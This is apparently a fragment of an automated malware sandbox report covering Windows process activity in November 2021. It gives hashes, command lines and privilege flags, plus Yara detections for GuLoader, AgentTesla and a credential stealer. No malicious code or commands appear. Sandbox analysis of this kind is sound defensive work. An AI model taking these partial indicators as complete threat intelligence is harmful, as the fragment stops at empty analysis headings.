                                              MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.4281032947.0000000000C10000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              General

                                              Start time:14:25:30
                                              Start date:29/11/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff74dcc0000
                                              File size:875008 bytes
                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:14:28:33
                                              Start date:29/11/2021
                                              Path:C:\Windows\System32\oobe\UserOOBEBroker.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                              Imagebase:0x7ff75d590000
                                              File size:57856 bytes
                                              MD5 hash:BCE744909EB87F293A85830D02B3D6EB
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Disassembly

                                              Code Analysis

                                              Reset < >